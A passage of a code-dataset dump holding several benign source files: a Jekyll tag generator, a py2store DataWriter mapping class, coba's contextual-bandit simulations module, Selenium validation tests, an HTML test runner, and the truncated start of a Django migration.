blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ddf09f47a9f2f78bb205d5e2492c3e024e6601e2 | 64ae05ddc478c214208f8d828447a3407ee12f30 | /tag_generator.py | 3c185d85e016c279a0743232fd0dbf3c4b8ea69b | [
"MIT"
] | permissive | ryan-kwan-do/ryan-kwan-do.github.io | 3618f991d09f203120f1fbccc84de87cd0cff0f4 | df1637c762c5cb3dd135474363765b815f16786a | refs/heads/master | 2021-04-29T09:01:23.801034 | 2020-06-08T10:19:04 | 2020-06-08T10:19:04 | 77,638,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | #!/usr/bin/env python
'''
tag_generator.py
Copyright 2017 Long Qian
Contact: lqian8@jhu.edu
This script creates tags for your Jekyll blog hosted by Github page.
No plugins required.
'''
import glob
import os

post_dir = '_texts/'
tag_dir = 'tag/'

# Collect every tag declared in the YAML front matter of the markdown posts.
total_tags = []
for filename in glob.glob(post_dir + '*md'):
    # Use a context manager so the file is always closed, even on error.
    with open(filename, 'r', encoding='utf8') as f:
        crawl = False  # True while scanning inside the front-matter block
        for line in f:
            if crawl:
                current_tags = line.strip().split()
                # Guard against blank lines inside the front matter, which
                # would otherwise raise IndexError on current_tags[0].
                if current_tags and current_tags[0] == 'tags:':
                    total_tags.extend(current_tags[1:])
                    crawl = False
                    break
            if line.strip() == '---':
                if not crawl:
                    # First '---' opens the front matter.
                    crawl = True
                else:
                    # Second '---' closes it; this post declared no tags.
                    crawl = False
                    break

total_tags = set(total_tags)

# Remove stale tag pages, then regenerate one page per tag.
old_tags = glob.glob(tag_dir + '*.md')
for tag in old_tags:
    os.remove(tag)
if not os.path.exists(tag_dir):
    os.makedirs(tag_dir)

for tag in total_tags:
    tag_filename = tag_dir + tag + '.md'
    with open(tag_filename, 'a') as f:
        write_str = '---\nlayout: tagpage\ntitle: \"Tag: ' + tag + '\"\ntag: ' + tag + '\nrobots: noindex\n---\n'
        f.write(write_str)
print("Tags generated, count", len(total_tags))
| [
"hello@ryanarmstrong.me"
] | hello@ryanarmstrong.me |
645ec5d8848843052470e3ac49f92599668cbea7 | 4e6e8c4b6c4e516e546ce17b887d43e6fd7a4100 | /py2store/scraps/old/data_writer.py | d35da60f068a56546a4f67cfad0b817491636f52 | [
"Apache-2.0"
] | permissive | i2mint/py2misc | fa60d81bab31d9b13579651d673a3622a8034c56 | 1ee704b1ab8dc33dd043c4332a444f41f0026189 | refs/heads/master | 2023-04-14T03:12:50.878497 | 2023-04-03T06:58:22 | 2023-04-03T06:58:22 | 200,088,028 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,520 | py | from collections.abc import MutableMapping
from py2store.scraps.old.obj_source import DictObjSource
class DataWriter(MutableMapping):
    """
    Abstract interface for a DataWriter.

    A DataWriter is a MutableMapping: concrete subclasses must implement
    __setitem__ and __delitem__ (declared here), plus the read-side methods
    (__getitem__, __len__, __iter__) that MutableMapping requires. The
    collections.abc machinery then supplies the remaining mixin methods:
    __contains__, keys, items, values, get, __eq__, __ne__, pop, popitem,
    update and setdefault.
    (see https://docs.python.org/3/library/collections.abc.html)
    """

    def __setitem__(self, k, v):
        # Write side of the mapping; must be supplied by subclasses.
        raise NotImplementedError("Need to implement in concrete class")

    def __delitem__(self, k):
        # Delete side of the mapping; must be supplied by subclasses.
        raise NotImplementedError("Need to implement in concrete class")

    def clear(self):
        # Deliberately override MutableMapping.clear so bulk deletion cannot
        # happen by accident; prints instructions instead of deleting.
        # NOTE(review): the printed text's exact indentation was lost in this
        # copy of the source -- confirm against the doctest output expected by
        # DictDataWriter before relying on it byte-for-byte.
        print('''
The MutableMapping clear method was overridden to make dangerous difficult.
If you really want to delete all your data, you can do so by doing:
    try:
        while True:
            self.popitem()
    except KeyError:
        pass''')
class DictDataWriter(DictObjSource, DataWriter):
    """
    An implementation of a DataWriter that uses a dict to store things.

    Reads come from DictObjSource (which supplies __getitem__, __len__ and
    __iter__ over the underlying dict ``self._d``), writes from the two
    methods below; together they satisfy the full MutableMapping protocol
    and its mixin methods: __contains__, keys, items, values, get, __eq__,
    and __ne__.

    >>> dw = DictDataWriter() # make an empty data writer, and write two items
    >>> dw['foo'] = 'bar'
    >>> dw['hello'] = 'world'
    >>> len(dw) # how many items do we have?
    2
    >>> list(dw) # what are their keys?
    ['foo', 'hello']
    >>> list(dw.items()) # what (key, value) pairs do we have?
    [('foo', 'bar'), ('hello', 'world')]
    >>> list(dw.keys()) # just the keys (same as list(dw), but dw.keys() gives us a KeysView)
    ['foo', 'hello']
    >>> list(dw.values()) # see the values
    ['bar', 'world']
    >>> del dw['foo'] # delete 'foo'
    >>> list(dw) # see that only 'hello' is left
    ['hello']
    >>>
    >>> # adding some more data
    >>> dw[42] = 'forty two'
    >>> dw[('e', 'mc', 2)] = 'tuple keys work' # actually, any hashable can be a key!
    >>> list(dw)
    ['hello', 42, ('e', 'mc', 2)]
    >>>
    >>> dw.pop(('e', 'mc', 2)) # pop data (get the data stored in a key, and remove it)
    'tuple keys work'
    >>> list(dw) # see what's left
    ['hello', 42]
    >>> dw.popitem() # pop an arbitrary item
    ('hello', 'world')
    >>> list(dw)
    [42]
    >>> 42 in dw
    True
    >>> dw.setdefault('this key does not exist', 'this is my default')
    'this is my default'
    >>> list(dw)
    [42, 'this key does not exist']
    >>> list(dw.items())
    [(42, 'forty two'), ('this key does not exist', 'this is my default')]
    >>> dw.update({42: 'not forty two anymore'})
    >>> list(dw.items())
    [(42, 'not forty two anymore'), ('this key does not exist', 'this is my default')]
    >>> dw.clear() # should be the "delete everything" method, but has been overridden for safe keeping
    <BLANKLINE>
    The MutableMapping clear method was overridden to make dangerous difficult.
    If you really want to delete all your data, you can do so by doing:
        try:
            while True:
                self.popitem()
        except KeyError:
            pass
    """

    def __setitem__(self, k, v):
        # Store directly in the backing dict provided by DictObjSource.
        self._d[k] = v

    def __delitem__(self, k):
        # Remove from the backing dict; raises KeyError for missing keys.
        del self._d[k]
| [
"thor@otosense.com"
] | thor@otosense.com |
a5177aabae7639bdb29fe0a4a0293316bd0c201f | a16f8a38725c306e80126bfb66f9d1953e8ee96a | /coba/simulations.py | 6ac39199e627c80da0552fbc3f8764bedfd27856 | [
"BSD-3-Clause"
] | permissive | pmineiro/coba | b5cd694abef5aa8e6cb74a9b86cb741c4a81bad1 | c3a2963f84c3d41bdaf1e5205278f2cbcda61046 | refs/heads/master | 2023-01-12T18:05:08.797525 | 2020-11-16T17:35:56 | 2020-11-16T17:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,600 | py | """The simulations module contains core classes and types for defining contextual bandit simulations.
This module contains the abstract interface expected for bandit simulations along with the
class defining an Interaction within a bandit simulation. Additionally, this module also contains
the type hints for Context, Action and Reward. These type hints don't contain any functionality.
Rather, they simply make it possible to use static type checking for any project that desires
to do so.
TODO Add RegressionSimulation
"""
import gc
import csv
import json
from collections import defaultdict
from itertools import compress, repeat, count, chain
from abc import ABC, abstractmethod
from typing import (
Optional, Iterable, Sequence, List, Union, Callable,
TypeVar, Generic, Hashable, Dict, Any, Tuple
)
import coba.random
from coba.data import Source, HttpSource, DiskSource
from coba.preprocessing import FactorEncoder, FullMeta, PartMeta, OneHotEncoder, NumericEncoder, Encoder
from coba.execution import ExecutionContext
# Type aliases used throughout the module. They carry no functionality;
# they only enable static type checking for downstream projects.
Context = Optional[Hashable]  # interaction context features (None for multi-armed bandits)
Action = Hashable             # features describing a single action
Reward = float                # the observed reward for a chosen action
Key = int                     # unique identifier of an interaction
Choice = int                  # index of a chosen action within an interaction's action set

# Covariant type variables for the context/action types produced by simulations.
_C_out = TypeVar('_C_out', bound=Context, covariant=True)
_A_out = TypeVar('_A_out', bound=Action, covariant=True)
class Interaction(Generic[_C_out, _A_out]):
    """A single point of interaction within a bandit simulation.

    Bundles together the observed context, the set of actions available to
    choose from, and a unique key identifying the interaction.
    """

    # The constructor must be type-ignored because pylance complains about
    # covariant type variables appearing in parameter positions.
    # See https://github.com/python/mypy/issues/2850 for more info.
    def __init__(self, context: _C_out, actions: Sequence[_A_out], key: Key = 0) -> None: #type: ignore
        """Instantiate Interaction.

        Args
            context: Features describing the interactions's context. Will be `None` for multi-armed bandit simulations.
            actions: Features describing available actions in the interaction.
            key    : A unique key assigned to this interaction.
        """

        assert actions, "At least one action must be provided to interact"

        self._key = key
        self._actions = actions
        self._context = context

    @property
    def context(self) -> _C_out:
        """The context in which this interaction occurred."""
        return self._context

    @property
    def actions(self) -> Sequence[_A_out]:
        """The actions available to choose from in this interaction."""
        return self._actions

    @property
    def key(self) -> Key:
        """The unique identifier of this interaction."""
        return self._key
class Simulation(Generic[_C_out, _A_out], ABC):
    """The simulation interface.

    A simulation exposes a re-iterable sequence of interactions along with a
    way to observe the rewards for chosen actions.
    """

    @property
    @abstractmethod
    def interactions(self) -> Sequence[Interaction[_C_out, _A_out]]:
        """The sequence of interactions in a simulation.

        Remarks:
            All Benchmark assume that interactions is re-iterable. So long as interactions is
            a Sequence it will always be re-iterable. If interactions was merely Iterable then
            it would be possible for it to only allow enumeration one time.
        """
        ...

    @abstractmethod
    def rewards(self, choices: Sequence[Tuple[Key, Choice]]) -> Sequence[Reward]:
        """The observed rewards for interactions (identified by its key) and their selected action indexes.

        Args:
            choices: A sequence of tuples containing an interaction key and an action index.

        Returns:
            A sequence of tuples containing context, action, and reward for the requested
            interaction/action. This sequence will always align with the provided choices.
        """
        ...
class JsonSimulation(Simulation[Context, Action]):
    """A Simulation implementation which supports loading and unloading from json representations.

    The underlying simulation is only constructed when entering the context
    manager and is released again on exit, so large simulations do not
    linger in memory longer than needed.
    """

    def __init__(self, json_val) -> None:
        """Instantiate a JsonSimulation.

        Args:
            json_val: A json string (or an already decoded json object) that
                can be turned into a simulation when needed.
        """
        self._json_obj = json.loads(json_val) if isinstance(json_val, str) else json_val
        self._simulation: Optional[Simulation[Context, Action]] = None

    def __enter__(self) -> 'JsonSimulation':
        """Load the simulation into memory. If already loaded do nothing."""

        # Only attempt construction when nothing is loaded yet. The previous
        # implementation conflated "already loaded" with "unrecognized type"
        # and incorrectly raised when the context was entered a second time.
        if self._simulation is None:
            if self._json_obj["type"] == "classification":
                self._simulation = ClassificationSimulation.from_json(self._json_obj["from"])
            else:
                raise Exception("We were unable to recognize the provided simulation type")

        return self

    def __exit__(self, exception_type, exception_value, traceback) -> None:
        """Unload the simulation from memory."""

        if self._simulation is not None:
            self._simulation = None
            gc.collect()  # in case the simulation is large

    @property
    def interactions(self) -> Sequence[Interaction[Context, Action]]:
        """The interactions in this simulation.

        Remarks:
            See the Simulation base class for more information.
        """
        if self._simulation is not None:
            return self._simulation.interactions

        raise Exception("A JsonSimulation must be loaded before it can be used.")

    def rewards(self, choices: Sequence[Tuple[Key, Choice]]) -> Sequence[Reward]:
        """The observed rewards for interactions (identified by its key) and their selected action indexes.

        Remarks:
            See the Simulation base class for more information.
        """
        if self._simulation is not None:
            return self._simulation.rewards(choices)

        raise Exception("A JsonSimulation must be loaded before it can be used.")
class MemorySimulation(Simulation[_C_out, _A_out]):
    """A Simulation whose interactions and rewards live entirely in memory.

    Built directly from parallel sequences of contexts, action sets and
    reward sets, producing one interaction per position.
    """

    def __init__(self,
        contexts   : Sequence[_C_out],
        action_sets: Sequence[Sequence[_A_out]],
        reward_sets: Sequence[Sequence[Reward]]) -> None:
        """Instantiate a MemorySimulation.

        Args:
            contexts: A collection of contexts to turn into a simulation.
            action_sets: A collection of action sets to turn into a simulation
            reward_sets: A collection of reward sets to turn into a simulation
        """

        assert len(contexts) == len(action_sets) == len(reward_sets), "Mismatched lengths of contexts, actions and rewards"

        # One interaction per (context, action set) pair, keyed by position.
        self._interactions = [
            Interaction(context, actions, key)
            for key, (context, actions) in enumerate(zip(contexts, action_sets))
        ]

        # Map each (interaction key, action index) choice to its reward.
        self._rewards: Dict[Tuple[Key, Choice], Reward] = {}
        for interaction, interaction_rewards in zip(self._interactions, reward_sets):
            for action_index, reward in enumerate(interaction_rewards):
                self._rewards[(interaction.key, action_index)] = reward

    @property
    def interactions(self) -> Sequence[Interaction[_C_out, _A_out]]:
        """The interactions in this simulation.

        Remarks:
            See the Simulation base class for more information.
        """
        return self._interactions

    def rewards(self, choices: Sequence[Tuple[Key, Choice]]) -> Sequence[Reward]:
        """The observed rewards for interactions (identified by its key) and their selected action indexes.

        Remarks:
            See the Simulation base class for more information.
        """
        return [self._rewards[choice] for choice in choices]
class LambdaSimulation(Simulation[_C_out, _A_out]):
    """A Simulation created from lambda functions that generate contexts, actions and rewards.

    Remarks:
        This implementation is useful for creating simulations from defined distributions.
    """

    def __init__(self,
        n_interactions: int,
        context   : Callable[[int], _C_out],
        action_set: Callable[[int], Sequence[_A_out]],
        reward    : Callable[[_C_out, _A_out], Reward],
        seed: Optional[int] = None) -> None:
        """Instantiate a LambdaSimulation.

        Args:
            n_interactions: How many interactions the LambdaSimulation should have.
            context: A function that should return a context given an index in `range(n_interactions)`.
            action_set: A function that should return all valid actions for a given context.
            reward: A function that should return the reward for a context and action.
            seed: An optional seed passed to coba's random generator so that
                generation is repeatable.
        """

        coba.random.seed(seed)

        contexts   : List[_C_out]           = []
        action_sets: List[Sequence[_A_out]] = []
        reward_sets: List[Sequence[Reward]] = []

        # Materialize every interaction up front; storage and reward lookup
        # are then delegated to an internal MemorySimulation.
        for i in range(n_interactions):
            _context    = context(i)
            _action_set = action_set(i)
            _reward_set = [reward(_context, _action) for _action in _action_set]

            contexts   .append(_context)
            action_sets.append(_action_set)
            reward_sets.append(_reward_set)

        self._simulation = MemorySimulation(contexts, action_sets, reward_sets)

    @property
    def interactions(self) -> Sequence[Interaction[_C_out, _A_out]]:
        """The interactions in this simulation.

        Remarks:
            See the Simulation base class for more information.
        """
        return self._simulation.interactions

    def rewards(self, choices: Sequence[Tuple[Key, Choice]]) -> Sequence[Reward]:
        """The observed rewards for interactions (identified by its key) and their selected action indexes.

        Remarks:
            See the Simulation base class for more information.
        """
        return self._simulation.rewards(choices)
class ClassificationSimulation(Simulation[_C_out, Tuple[int, ...]]):
    """A simulation created from classifier data with features and labels.

    ClassificationSimulation turns labeled observations from a classification data
    set into interactions. For each interaction the feature set becomes the context and
    all possible labels become the actions. Rewards for each interaction are created by
    assigning a reward of 1 for taking the correct action (i.e., choosing the correct
    label) and a reward of 0 for taking any other action (i.e., choosing any of the
    incorrect labels).

    Remark:
        This class when created from a data set will load all data into memory. Be careful when
        doing this if you are working with a large dataset. To reduce memory usage you can provide
        meta information upfront that will allow features to be correctly encoded while the
        dataset is being streamed instead of waiting until the end of the data to train an encoder.
    """

    @staticmethod
    def from_json(json_val: Union[str, Dict[str, Any]]) -> 'ClassificationSimulation[Context]':
        """Construct a ClassificationSimulation object from JSON.

        Args:
            json_val: Either a json string or the decoded json object.

        Returns:
            The ClassificationSimulation representation of the given JSON string or object.
        """

        config = json.loads(json_val) if isinstance(json_val, str) else json_val

        # Shared defaults used by the "csv" and "table" formats below.
        has_header  : bool                = True
        default_meta: FullMeta            = FullMeta()
        defined_meta: Dict[Any, PartMeta] = {}

        if config["format"] == "openml":
            with ExecutionContext.Logger.log(f"loading openml {config['id']}..."):
                return ClassificationSimulation.from_openml(config["id"], config.get("md5_checksum", None))

        if config["format"] == "csv":
            location    : str           = config["location"]
            md5_checksum: Optional[str] = None

            if "md5_checksum" in config:
                md5_checksum = config["md5_checksum"]

            if "has_header" in config:
                has_header = config["has_header"]

            if "column_default" in config:
                default_meta = FullMeta.from_json(config["column_default"])

            if "column_overrides" in config:
                for key, value in config["column_overrides"].items():
                    defined_meta[key] = PartMeta.from_json(value)

            return ClassificationSimulation.from_csv(
                location     = location,
                md5_checksum = md5_checksum,
                has_header   = has_header,
                default_meta = default_meta,
                defined_meta = defined_meta
            )

        if config["format"] == "table":
            table: Iterable[Sequence[str]] = config["table"]

            if "has_header" in config:
                has_header = config["has_header"]

            if "column_default" in config:
                default_meta = FullMeta.from_json(config["column_default"])

            if "column_overrides" in config:
                for key, value in config["column_overrides"].items():
                    defined_meta[key] = PartMeta.from_json(value)

            return ClassificationSimulation.from_table(
                table        = table,
                has_header   = has_header,
                default_meta = default_meta,
                defined_meta = defined_meta
            )

        raise Exception("We were unable to recognize the provided data format.")

    @staticmethod
    def from_openml(data_id: int, md5_checksum: str = None) -> 'ClassificationSimulation[Context]':
        """Create a ClassificationSimulation from a given openml dataset id.

        Args:
            data_id: The unique identifier for a dataset stored on openml.
            md5_checksum: The expected md5 checksum of the downloaded csv dataset
                to ensure data integrity.
        """

        openml_api_key = ExecutionContext.Config.openml_api_key

        data_description_url = f'https://www.openml.org/api/v1/json/data/{data_id}'
        task_description_url = f'https://www.openml.org/api/v1/json/task/list/data_id/{data_id}'
        type_description_url = f'https://www.openml.org/api/v1/json/data/features/{data_id}'

        if openml_api_key is not None:
            data_description_url += f'?api_key={openml_api_key}'
            task_description_url += f'?api_key={openml_api_key}'
            type_description_url += f'?api_key={openml_api_key}'

        descr = json.loads(''.join(HttpSource(data_description_url, '.json', None, 'descr').read()))["data_set_description"]

        if descr['status'] == 'deactivated':
            raise Exception(f"Openml {data_id} has been deactivated. This is often due to flags on the data.")

        tasks = json.loads(''.join(HttpSource(task_description_url, '.json', None, 'tasks').read()))["tasks"]["task"]

        # NOTE(review): task_type_id == 1 is presumably openml's id for
        # supervised classification tasks -- confirm against the openml API docs.
        if not any(task["task_type_id"] == 1 for task in tasks):
            raise Exception(f"Openml {data_id} does not appear to be a classification dataset")

        types = json.loads(''.join(HttpSource(type_description_url, '.json', None, 'types').read()))["data_features"]["feature"]

        defined_meta: Dict[str, PartMeta] = {}

        # Build per-column meta from openml's feature descriptions: ignore row
        # identifiers/ignored columns, mark the target, and pick an encoder
        # based on the declared data type.
        for tipe in types:
            defined_meta[tipe["name"]] = PartMeta(
                ignore  = tipe["is_ignore"] == "true" or tipe["is_row_identifier"] == "true",
                label   = tipe["is_target"] == "true",
                encoder = NumericEncoder() if tipe['data_type'] == 'numeric' else FactorEncoder(tipe['nominal_value'], error_if_unknown=True)
            )

        csv_url = f"http://www.openml.org/data/v1/get_csv/{descr['file_id']}"

        return ClassificationSimulation.from_csv(csv_url, md5_checksum=md5_checksum, defined_meta=defined_meta)

    @staticmethod
    def from_csv(
        location    : str,
        label_col   : Union[None, str, int] = None,
        md5_checksum: Optional[str] = None,
        csv_reader  : Callable[[Iterable[str]], Iterable[Sequence[str]]] = csv.reader,  #type: ignore #pylance complains
        has_header  : bool = True,
        default_meta: FullMeta = FullMeta(),
        defined_meta: Dict[Any, PartMeta] = {}) -> 'ClassificationSimulation[Context]':
        """Create a ClassificationSimulation given the location of a csv formatted dataset.

        Args:
            location: The location of the csv formatted dataset.
            label_col: The name of the column in the csv file that represents the label.
            md5_checksum: The expected md5 checksum of the csv dataset to ensure data integrity.
            csv_reader: A method to parse file lines at csv_path into their string values.
            has_header: Indicates if the csv file has a header row.
            default_meta: The default meta values for all columns unless explicitly overridden with defined_meta.
            defined_meta: Keys are column name or index, values are meta objects that override the default values.
        """

        source: Source[Iterable[str]]

        # Anything not starting with http(s) is treated as a path on disk.
        if not location.lower().startswith('http'):
            source = DiskSource(location)
        else:
            source = HttpSource(location, ".csv", md5_checksum, 'data')

        csv_rows = list(csv_reader(source.read()))

        with ExecutionContext.Logger.log('encoding data... '):
            return ClassificationSimulation.from_table(csv_rows, label_col, has_header, default_meta, defined_meta)

    @staticmethod
    def from_table(
        table       : Iterable[Sequence[str]],
        label_col   : Union[None, str, int] = None,
        has_header  : bool = True,
        default_meta: FullMeta = FullMeta(),
        defined_meta: Dict[Any, PartMeta] = {}) -> 'ClassificationSimulation[Context]':
        """Create a ClassificationSimulation from the rows contained in a csv formatted dataset.

        Args:
            table: Any iterable of rows (i.e., sequence of str) with each row containing features/labels.
            label_col: Either the column index or the header name for the label column.
            has_header: Indicates if the first row in the table contains column names
            default_meta: The default meta values for all columns unless explicitly overridden with defined_meta.
            defined_meta: Keys are column name or index, values are meta objects that override the default values.
        """

        # In theory we don't have to load the whole file up front. However, in practice,
        # not loading the file upfront is hard due to the fact that Python can't really
        # guarantee a generator will close a file.
        # For more info see https://stackoverflow.com/q/29040534/1066291
        # For more info see https://www.python.org/dev/peps/pep-0533/

        itable = filter(None, iter(table))  # filter out empty rows

        # get first row to determine number of columns and
        # then put the first row back for later processing
        first = next(itable)
        n_col = len(first)
        itable = chain([first], itable)

        header: Sequence[str] = next(itable) if has_header else []

        # Resolve the label column to a numeric index (or None when absent).
        label_index = header.index(label_col) if label_col in header else label_col if isinstance(label_col, int) else None  # type: ignore

        if isinstance(label_col, str) and label_col not in header:
            raise Exception("We were unable to find the label column in the header row (or there was no header row).")

        if any(map(lambda key: isinstance(key, str) and key not in header, defined_meta)):
            raise Exception("We were unable to find a meta column in the header row (or there was no header row).")

        def index(key: Union[int, str]):
            # Translate a header name into its column index; ints pass through.
            return header.index(key) if isinstance(key, str) else key

        over_metas = defaultdict(PartMeta, { index(key): val for key, val in defined_meta.items() })
        metas      = [ default_meta.override(over_metas[i]) for i in range(n_col) ]

        if label_index is not None:
            metas[label_index] = metas[label_index].override(PartMeta(label=True))

        # after extensive testing I found that performing many loops with simple logic
        # was about 3 times faster than performing one or two loops with complex logic

        # extract necessary meta data one time
        is_not_ignores = [ not m.ignore for m in metas ]

        # transform rows into columns
        columns = list(zip(*itable))

        # remove ignored columns
        metas   = list(compress(metas, is_not_ignores))
        columns = list(compress(columns, is_not_ignores))

        # create encoding groups according to column type
        label_encodings  : List[Sequence[Hashable]] = []
        feature_encodings: List[Sequence[Hashable]] = []

        # encode columns and place in appropriate group
        for col, m in zip(columns, metas):

            encoding = label_encodings if m.label else feature_encodings
            encoder  = m.encoder if m.encoder.is_fit else m.encoder.fit(col)

            # A one-hot encoder expands a single source column into several
            # encoded columns; other encoders produce exactly one.
            if isinstance(encoder, OneHotEncoder):
                encoding.extend(list(zip(*encoder.encode(col))))
            else:
                encoding.append(encoder.encode(col))

        # transform columns back into rows
        features = list(zip(*feature_encodings))  #type: ignore
        labels   = list(zip(*label_encodings))    #type: ignore

        # turn singular tuples into their values
        contexts = [ f if len(f) > 1 else f[0] for f in features ]
        actions  = [ l if len(l) > 1 else l[0] for l in labels ]

        return ClassificationSimulation(contexts, actions)

    def __init__(self, features: Sequence[_C_out], labels: Sequence[Action]) -> None:
        """Instantiate a ClassificationSimulation.

        Args:
            features: The collection of features used for the original classifier problem.
            labels: The collection of labels assigned to each observation of features.
        """

        assert len(features) == len(labels), "Mismatched lengths of features and labels"

        # Every interaction offers the full one-hot encoded label set as its
        # actions; the reward vector is the one-hot encoding of the true label
        # (1 for the correct label, 0 otherwise).
        action_set = list(set(labels))

        contexts = features
        actions  = list(repeat(OneHotEncoder(action_set).encode(action_set), len(contexts)))
        rewards  = OneHotEncoder(action_set).encode(labels)

        self._action_set = action_set
        self._simulation = MemorySimulation(contexts, actions, rewards)

    @property
    def interactions(self) -> Sequence[Interaction[_C_out, Tuple[int, ...]]]:
        """The interactions in this simulation.

        Remarks:
            See the Simulation base class for more information.
        """
        return self._simulation.interactions

    def rewards(self, choices: Sequence[Tuple[Key, Choice]]) -> Sequence[Reward]:
        """The observed rewards for interactions (identified by its key) and their selected action indexes.

        Remarks:
            See the Simulation base class for more information.
        """
        return self._simulation.rewards(choices)
"rucker.mark@gmail.com"
] | rucker.mark@gmail.com |
573d56e8d5f6dc0a9dec7a2af9be5f84e0ddc6c0 | 0d4250be9a9431528a94aaf397b398022730d1cb | /functional_tests/test_list_item_validation.py | 6f51eae18854b4e8b11cd4056f45792ca456cde7 | [] | no_license | sward1/tdd | 07cc8c9859e7862c040016467f862d1eb2b3836e | 495e0ab74ab23006926c031b349b1092b1f94b6c | refs/heads/master | 2021-01-10T18:37:04.766809 | 2015-04-24T15:52:47 | 2015-04-24T15:52:47 | 33,563,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | from unittest import skip
from .base import FunctionalTest
class ItemValidationTest(FunctionalTest):
    """Selenium functional tests covering list-item form validation.

    Each test drives a real browser session (provided by FunctionalTest)
    through the user-facing validation flows: empty items, duplicate items
    and live clearing of error messages.
    """

    def get_error_element(self):
        # The validation error is rendered inside Bootstrap's .has-error block.
        return self.browser.find_element_by_css_selector('.has-error')

    def test_cannot_add_empty_list_items(self):
        # Edith goes to the home page and accidentally tries to submit
        # an empty list item. She hits enter on the empty input box
        self.browser.get(self.server_url)
        self.get_item_input_box().send_keys('\n')

        # The home page refreshes, and there is an error message saying
        # that list items cannot be blank
        error = self.get_error_element()
        self.assertEqual(error.text, "You can't have an empty list item")

        # she tries again with some text for the item, which now works
        self.get_item_input_box().send_keys('Buy milk\n')
        self.check_for_row_in_list_table('1: Buy milk')

        # Perversely, she now decides to submit a second blank list item
        self.get_item_input_box().send_keys('\n')

        # She receives a similar warning on the list page
        self.check_for_row_in_list_table('1: Buy milk')
        error = self.get_error_element()
        self.assertEqual(error.text, "You can't have an empty list item")

        # And she can correct it by filling some text in
        self.get_item_input_box().send_keys('Make tea\n')
        self.check_for_row_in_list_table('1: Buy milk')
        self.check_for_row_in_list_table('2: Make tea')

    def test_cannot_add_duplicate_items(self):
        # Edith goes to the home page and starts a new list
        self.browser.get(self.server_url)
        self.get_item_input_box().send_keys('Buy wellies\n')
        self.check_for_row_in_list_table('1: Buy wellies')

        # She accidentally tries to enter a duplicate item
        self.get_item_input_box().send_keys('Buy wellies\n')

        # She sees a helpful error message
        self.check_for_row_in_list_table('1: Buy wellies')
        error = self.get_error_element()
        self.assertEqual(error.text, "You've already got this in your list")

    def test_error_messages_are_cleared_on_input(self):
        # Edith starts a new list in a way that causes a validation error
        self.browser.get(self.server_url)
        self.get_item_input_box().send_keys('\n')
        error = self.get_error_element()
        self.assertTrue(error.is_displayed())

        # She starts typing in the input box to clear the error
        self.get_item_input_box().send_keys('a')

        # She is pleased to see that the error message disappears
        error = self.get_error_element()
        self.assertFalse(error.is_displayed())
| [
"stephenjward1@gmail.com"
] | stephenjward1@gmail.com |
303637e4e2c0872d7c466e7edbcdc7342dabb578 | 6feb9f4729a4bd13c678ba1a0f29a9fede1ae906 | /runner.py | b46c0e6bd3042960f4424158bd2dd4ec1951b06b | [] | no_license | bejerome/Testdemo | 1031d6c0c012e73891ba8efe07d97f06bf4ea402 | b5f45762635b56c6d52b46def296b2f40d5fc0f0 | refs/heads/main | 2023-08-24T11:28:31.987730 | 2021-09-29T16:46:00 | 2021-09-29T16:46:00 | 411,760,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | __author__ = 'Ben'
import unittest
from Tests.login_test_suite import LoginTest
import os
import HtmlTestRunner
# NOTE(review): `direct` is assigned but never used below -- presumably kept
# for interactive/debugging use; confirm before removing.
direct = os.getcwd()


class MyTestSuite(unittest.TestCase):
    """Wraps the smoke-test suite so it can be launched via unittest.

    Running this TestCase builds a TestSuite from LoginTest and executes it
    with an HTML report writer.
    """

    def testIssue(self):
        # Assemble the smoke-test suite from the login tests.
        smoke_test = unittest.TestSuite()
        smoke_test.addTests([
            unittest.defaultTestLoader.loadTestsFromTestCase(LoginTest),
        ])

        # Run the suite with an HTML reporter; reports land in ./reports/
        # with a timestamped filename and open in the browser when done.
        runner1 = HtmlTestRunner.HTMLTestRunner(
            output="./reports/",
            report_title="Demo Test Suite",
            descriptions=True,
            add_timestamp=True,
            open_in_browser=True
        )
        runner1.run(smoke_test)


if __name__ == '__main__':
    unittest.main()
| [
"benjaminjjerome@gmail.com"
] | benjaminjjerome@gmail.com |
916417b7dddb729035932c4ce63759c55fd9fa89 | 32453c2e63c8060cf81c52443cf481a83f450aeb | /UserApp/migrations/0001_initial.py | 1db7da94ce1849cbd7981422ab862c9ebde1d77d | [] | no_license | sz66cm/dgrentapp | d0d70bc236ad5fe8a7c9adf0364730e7a54fb0ee | bb78ee037353bc0ba5788563dd5a8ef068501fb2 | refs/heads/master | 2021-01-09T20:08:28.320340 | 2016-08-12T12:44:15 | 2016-08-12T12:44:15 | 65,522,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,936 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-10 09:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration (Django 1.9.9, 2016-08-10).

    Creates the Cost, CostType, User and UserType tables. Generated code --
    do not hand-edit field definitions; create a follow-up migration instead.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Cost',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('type_id', models.IntegerField()),
                ('cost_num', models.DecimalField(decimal_places=2, max_digits=8)),
                ('start', models.TimeField(auto_now_add=True)),
                ('end', models.TimeField()),
            ],
        ),
        migrations.CreateModel(
            name='CostType',
